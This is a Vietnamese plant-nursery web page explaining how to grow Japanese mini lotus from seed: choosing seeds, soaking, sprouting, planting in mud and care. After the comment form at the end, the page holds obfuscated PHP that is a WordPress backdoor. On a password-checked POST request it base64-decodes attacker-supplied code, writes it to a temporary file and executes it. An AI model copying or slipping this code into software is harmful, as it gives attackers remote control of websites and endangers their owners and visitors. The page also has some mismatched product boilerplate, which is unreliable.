Gợi ý bạn cách trồng sen Nhật hiệu quả nhất

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Cách trồng sen Nhật – Nếu bạn đang tìm kiếm một loại sen dành riêng cho những hồ thuỷ sinh hay những thác nước phong thuỷ, nếu bạn đang tìm một loại cây có thể giúp tâm hồn thanh thản, thư giãn thì đây chính là loại hoa dành cho bạn.

Sen Nhật thường ra hoa sau một năm trồng và chăm bón, sen Nhật là loại cây không ưa lạnh, chúng sinh trưởng nhanh ở những vùng có khí hậu ấm, nóng, chính vì vậy, đây là loại sen khá dễ  chăm sóc ở Việt Nam.

Vậy, trồng sen Nhật như thế nào? Chăm sóc sen Nhật ra sao để đảm bảo bảo cho cây sinh trưởng và phát triển tốt? Hãy cùng theo dõi bài viết dưới đây mà Vườn cây Hòa Bình chia sẻ với bạn.

>>>Xem thêm: Thông tin chi tiết về vườn cây Hòa Bình.

Sen Nhật mini – Cách trồng hạt giống

Cách chọn hạt giống để trồng sen Nhật

Để cho ra loại sen Nhật chất lượng nhất, đảm bảo về tỉ lệ nở đồng đều và cây phát triển tốt, điều chúng ta cần quan tâm nhất đó là giống cây sen Nhật.

Sở dĩ đây là yếu tố quan trọng nhất là vì: Giống cây quyết định phần lớn đến tỉ lệ nảy mầm của cây sen Nhật.

Chúng ta có thể xác định hạt mầm có chất lượng hay không thông qua lượng cao thường sở hữu lớp vỏ màu nâu, hoặc đen bóng.

Ngoài ra, khi thu hoạch hạt ở những bát sen già, tỉ lệ nảy mầm của hạt sẽ cao hơn và nhanh hơn.

>>>Xem thêm: Ý nghĩa của cây mai ngày tết.

Cách trồng sen Nhật

Trước khi tiến hành trồng sen Nhật, chúng ta nên ngâm hạt giống khoản 4 tiếng vào trong nước, công việc này giúp cho hạt giống mềm ra, dễ dàng cho các bước tiếp theo.

Khi mầm sen Nhật đã mềm ra rồi, chúng ta tiến hành gọt hai đầu sen đi.

Khi trồng sen, chúng ta cần lưu ý về thời vụ thích hợp để trồng sen, theo đó, vụ đông xuân(từ tháng 12 đến tháng 1) và vụ hè thu(Từ tháng 5 đến tháng 7) là khoảng thời gian thích hợp nhất để trồng sen Nhật.

 

Các bước trồng sen Nhật được tiến hành như sau:

Bước 1: Xử lý phần đầu hạt giống bằng cách cắt hai đầu đi, việc này giúp cho hạt giống nhanh chóng nảy mầm hơn..

Bước 2, tiến hành ngâm hạt mầm trong nước ấm khoảng 30 độ c, ngày thay nước khoảng 2 lần, sau đó, đem mầm sen phơi nắng khoảng hai lần một ngày, trong khoảng thời gian sáng và tối, để giúp cho cây không bị còi cọc.

Bước 3, sau khi ngân mầm sen và phơi nắng, sau 5 đến 7 ngày là mầm sen đã bắt đầu nhú mầm, đây chính là thời điểm thích hợp để chúng ta cho sen làm quen dần với bùn.

Tiếp đó, ta lấy một ít bùn, hoặc đất phù sa, tiến hành cho vào một cốc nước hoặc chậu, tiến hành hòa tan hỗn hợp trên và tiến hành trồng sen.

Trong quá trình lựa chọn bùn hoặc đất để trồng sen, hãy đảm bảo rằng nó không chứa mầm bệnh, nếu có, hãy xử lý bùn trước khi trồng sen Nhật bằng vôi bột.

Bước 4: Khi mầm sen đã bắt đầu nhú dài, đồng thời bắt đầu hình thành lá và rễ, hãy thả nhẹ hạt mầm vào bùn để sen Nhạt tự bám rễ.

Nên trồng ở nơi có ánh nắng và tránh để hạt sen quá sâu với bùn, tránh sự thối rữa của mầm sẽ khiến hạt sen không nở được.

Bước 5: Đây là bước phòng bệnh cho sen đá, tiến hành xịt thuốc nấm xung quanh lá sen.

Bước 6: Sen Nhật thường ra hoa khá nhanh, chỉ khoảng 3 tháng, sen sẽ bắt đầu nhú ra những nụ hoa đầu tiên.

Vậy thì bao lâu sen Nhật sẽ tàn?

Trong quá trình sinh trưởng, Sen Nhật sinh ra rất nhiều nhánh và ngòi, chính vì vậy, mỗi bông hoa sen Nhật chỉ chơi được từ 3 – 5 ngày.

Tuy nhiên, khi bông này tàn thì bỗng khác lại nhú lên, chính vì thế mà sen có thể nở quanh năm.

>>> Xem thêm: Cây kim tiền để bàn

Sen Nhật Mini – Một số cách chăm sóc hạt giống

Mặc dù bùn là môi trường thuận lợi để sen Nhật phát triển, nhưng sen là loài hoa sợ bùn, sợ bẩn, do đó, chúng ta cần lưu ý xử lý bùn nên trồng sen Nhật trong những ly thuỷ tinh hoặc chậu nhỏ.

Tránh sử dụng những loại bùn chứa nhiều tạp chất, như đã nói ở phần trên, cách tốt nhất để hoa sen không bị lụi và nhanh chết, trước khi đem trồng chúng ta nên xử lý bùn qua vôi.

Yếu tố cần duy trì và đảm bảo cho sen nhất trong toàn bộ quá trình nuôi đó là ánh sáng và độ ẩm, chính vì vậy, hãy để sen Nhật ở những nơi có ánh sáng mặt trời.

Bổ sung phân bón và đạm cho sen Nhật khi thấy các dấu hiệu vàng lá hay còi cọc.

Trồng sen Nhật, bên cạnh yếu tố thẩm mỹ, giúp làm đẹp không gian sống ra, thì đây còn là một loại hoa, một loại cây cảnh có hương thơm dễ chịu, giúp thư giãn tâm hồn và giúp ta dễ ngủ hơn.

>>>Xem thêm: Ý nghĩa của cây mai ngày tết.

Vì thế, hãy tự tay trồng cho mình những cây sen đá thật đẹp qua cách trồng sen Nhật mà Vườn cây Hòa Bình chia sẻ ở bài viết trên nhé.

Ngoài ra, đừng quên theo dõi trang web của chúng tôi nhiều hơn để cập nhật thêm những thông tin bổ ích và thú vị về cây cảnh.

 

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}